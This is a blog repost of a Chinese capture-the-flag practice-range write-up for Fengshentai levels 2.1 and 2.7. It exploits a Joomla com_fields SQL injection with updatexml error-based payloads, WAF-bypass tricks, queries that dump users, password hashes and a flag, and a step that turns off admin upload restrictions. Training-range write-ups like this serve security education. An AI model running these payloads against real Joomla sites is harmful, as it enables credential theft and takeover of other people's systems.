首页 > 其他分享 >封神台靶场2.1以及2.7

封神台靶场2.1以及2.7

时间:2022-10-09 10:56:04浏览次数:43  
标签:神台 0x23 0x7e flag limit select 2.1 2.7 concat

先看网站是什么cms 插件 指纹识别工具

然后去查看cms 的版本

然后下载对应的环境去模拟

然后去下载对应版本的cms漏洞 寻找poc exp 等利用语句

第一种用burp抓包改

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3e,user()),0)

如果有防火墙防护 去绕过 传参方式

get请求换post 如果还不行 可以添加垃圾字符串绕过/*111*/

 

第二种加引号闭合绕过

/?option=com_fields&view=fields&layout=modal&list[fullordering]=`updatexml`(0x23,concat(1,user()),1)

然后这里有sql注入漏洞 然后进行语句注入

询表名
(0x23,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)

然后去爆破查找flaq的表


询用户名
(0x23,concat(0x7e,(select username from #__users limit 0,1)),1)


查询密码
(0x23,concat(0x7e,(select password from #__users limit 0,1)),1)

(0x23,concat(0x7e,(select keywords from #__user_flag limit 0,1)),1)

flag爆不出来 应该是keywords这个字段被修改了

然后经过查找发现字段为passwd

(0x23,concat(0x7e,(select passwd from #__user_flag limit 0,1)),1)

md5解密为HelloWorld

然后输入/administrator进入后台

进入多媒体文件管理并将限制上传权限和是否检查MIME类型改为否

然后找到flag 但并不是靶场2.1的flag为靶场2.7的flag

标签:神台,0x23,0x7e,flag,limit,select,2.1,2.7,concat
From: https://www.cnblogs.com/Ctsz1/p/16771369.html

相关文章

  • 界面组件DevExpress WinForms v22.1 - 数据可视化功能全新升级
    DevExpressWinForms拥有180+组件和UI库,能为WindowsForms平台创建具有影响力的业务解决方案。DevExpressWinForms能完美构建流畅、美观且易于使用的应用程序,无论是Office......
  • 【闲话】2022.10.08
    今日考试又寄了怎么凡是Accoders上的考试我都会寄啊今天Winter'SRain先生搞魔改猪国杀然后\(\color{red}{\查\抄\正\着\}\)实在是……太巨了今天挂一张......
  • 1 1.1.1.1 1.1.2 1.3 2 2.1 ...这样的数据sql排序
    ----其中wbscode为1 1.1.1 1.1.2这样的编码。主要关注的地方为:1分解函数  2.根据分解函数进行行转列  3最终合并数据去重 -----分解函数CREATEFUNCTI......
  • 2022.10.8
    关于我电脑坏了:隔了好久没有写东西主要原因是电脑坏了电脑店老板给人感觉挺不错的,说自己也是网络工程,但是那个时候有学硬件方向他给我看了电脑,说是主板问题,他修不了,可......
  • 2022.10.7第三次组会记录
    团队:集农广益小组地点:桃园食堂时间:晚上九点参与人:全体人员组会内容摘要:分析项目具体架构和功能,讨论数据流图的设计要求组会主要内容:1.分析讨论用户的具体功能:发帖、......
  • 2022.10.7
    ACM。结果不是很好。一开始的节奏是很好的,但从A题调不出来开始就乱了。每个人再自己的题上都有深入思考,但对别人的情况不了解,所以讨论的效率实际不高,而且很容易被套进死胡......
  • 【闲话】2022.10.07
    发现似乎我妈登上博客园了那我是不是该收敛点啊总之今天考了场试啊密码还是我的某中文网名全拼。还是相对论:只要大家都挂了那我就没有挂————bikuhiku看......
  • 闲话 22.10.7
    闲话最近洛谷犇犇炸了诶所以没有地方推流了所以开摆了最近想用代数工业优化dp今天社论就是一道但是推广的时候就会遇到很多问题所以有什么偏难怪题让我切吗今天早......
  • Matlab function 2.22.10.07
    functiony=myfun1(x)z=x+1;y=z*2;functiony=myfun2(x)ifx>10y=99;elseifx>0y=1;elsey=-1;endfunctiony=myfun3(x)switchx......
  • 社论 22.10.7
    CF1603F给定三个正整数\(n,k,x\),求满足以下条件的序列\(a_{1...n}\)的个数:对于每一个\(1\leqslanti\leqslantn\),\(0\leqslanta_i<2^k\)。序列\(a\)没......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99